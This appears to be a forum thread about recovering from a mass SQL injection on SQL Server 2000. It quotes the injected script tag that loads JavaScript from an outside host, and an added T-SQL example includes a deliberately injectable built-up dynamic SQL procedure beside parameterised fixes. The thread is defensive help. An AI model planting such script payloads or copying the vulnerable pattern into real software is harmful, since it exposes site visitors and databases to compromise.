injection attack

  • Please help me!

    I'm under an injection attack and I don't know what I can do.

    This script ' script src=http://www.hdadwcd.com/b.js /script' is injected into my database (SQL Server 2000).

    It was not only injected into many of the database fields but also renamed my publication name to:

    " publication name script src=http://www.hdadwcd.com/b.js /script "

    How can I repair it and stop this injection?

    How can I edit binary fields in MSrepl_commands and delete this script from the command field?

  • You need to find the application that is vulnerable to injection (you can use profiler to see the commands coming to the database).

    There isn't a quick silver bullet on this. You need to find the vulnerable pages and fix them. Change SQL statements to parameterised rather than built up. Restrict the app's permissions to not allow it to directly access the tables but to use stored procs.

    I would suggest that you drop the publication in question and recreate it.

    Gail Shaw
    Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
    SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability

    We walk in the dark places no others will enter
    We stand on the bridge and no one may pass
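
Added example, not part of the original thread or any poster's code: the built-up versus parameterised statement and the stored-procedure-only permissions recommended in the reply above, in T-SQL. The table dbo.Articles, the procedure names and the database user web_app are hypothetical.

```sql
-- Hypothetical table, procedures and user (web_app); not from the thread.
CREATE TABLE dbo.Articles (
    ArticleId INT IDENTITY(1,1) PRIMARY KEY,
    Title     VARCHAR(200)  NOT NULL,
    Body      VARCHAR(4000) NOT NULL
)
GO

-- BEFORE: built-up statement. The caller's value is spliced into the SQL
-- text, so a quote inside @Title ends the literal and the remainder is
-- parsed as SQL. Wrapping it in a stored procedure does not help.
CREATE PROCEDURE dbo.FindArticles_BuiltUp
    @Title VARCHAR(200)
AS
    DECLARE @sql NVARCHAR(4000)
    SET @sql = N'SELECT ArticleId, Title FROM dbo.Articles WHERE Title = '''
             + @Title + N''''
    EXEC (@sql)
GO

-- AFTER (static): the value is only ever bound as data.
CREATE PROCEDURE dbo.FindArticles
    @Title VARCHAR(200)
AS
    SELECT ArticleId, Title FROM dbo.Articles WHERE Title = @Title
GO

-- AFTER (dynamic SQL still required): keep the text constant and pass the
-- value through sp_executesql's parameter list.
CREATE PROCEDURE dbo.FindArticles_Dynamic
    @Title VARCHAR(200)
AS
    DECLARE @sql NVARCHAR(4000)
    SET @sql = N'SELECT ArticleId, Title FROM dbo.Articles WHERE Title = @t'
    EXEC sp_executesql @sql, N'@t VARCHAR(200)', @t = @Title
GO

-- Permissions: the application account may run the procedure but cannot
-- touch the table directly. Ownership chaining lets dbo.FindArticles read
-- dbo.Articles; it does not apply to EXEC()/sp_executesql text, so
-- dbo.FindArticles_Dynamic would fail for web_app under this DENY.
DENY SELECT, INSERT, UPDATE, DELETE ON dbo.Articles TO web_app
GRANT EXECUTE ON dbo.FindArticles TO web_app
GO
```
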
  • When reading this, scroll up to the top of this page; in the upper frame you will see Search: type in the word "injection" (without the quotes) and then click the button labelled Go. And be prepared to read a vast amount of information concerning your problem and some recommended solutions from articles and forums here on SQL ServerCentral.

    If everything seems to be going well, you have obviously overlooked something.

    Ron


  • Hi

    Thank you for your last reply.

    I resolved that problem by editing all tables and removing that script.

    I think it was a new injection method.

    This link was helpful:

    http://www.msblog.org/index.php?s=yp

    http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

    But I couldn’t resolve a part of the problem:

    There were many Binary fields in MSrepl_commands containing bad script.

    I deleted them because I couldn’t edit them.

    I would be pleased to be taught “how to edit the MSrepl_commands command field and alter its data”.

    Yours truly

    saeed.

  • The safest fix is probably to completely drop the replication and recreate it.

  • Wow, this is an old thread but still very pertinent.

    We are rapidly migrating to SQL 2005.

    But we were attacked by injection ... every varchar field in every table replaced with similar .js crap. We restored and the world was good.

    But we're trying to find the vulnerability ... of the publicly visible pages on the site (only 5 or 6), all are derived with stored procs and/or our own in-house brewed trap.

    We are told that SQL2005 and SQL2008 handle SQL injections far better.

    We are also about to, within a month, implement a proper SQL Server 2005 mirror. But of course mirrors will merely mirror the injection; right?

    I'm babbling ... but beyond stored procs and home-grown filters, are there any other known hardware/software remedies?

    You refer to a profiler to see commands ... where is that?

  • Can you post this in a new thread please?

  • Sorry .. by all means .. I'm new here ... my bad.

    A new thread or somewhere you'd prefer?

    Robert

  • New thread in the appropriate forum. Probably SQL 2005 T-SQL. Some people will look at a thread with lots of replies and not check it, assuming it's answered already.

  • Ok, will do BUT ... the main gist of this post was your mention of the "profiler"?

    We are trying to determine the vulnerability?
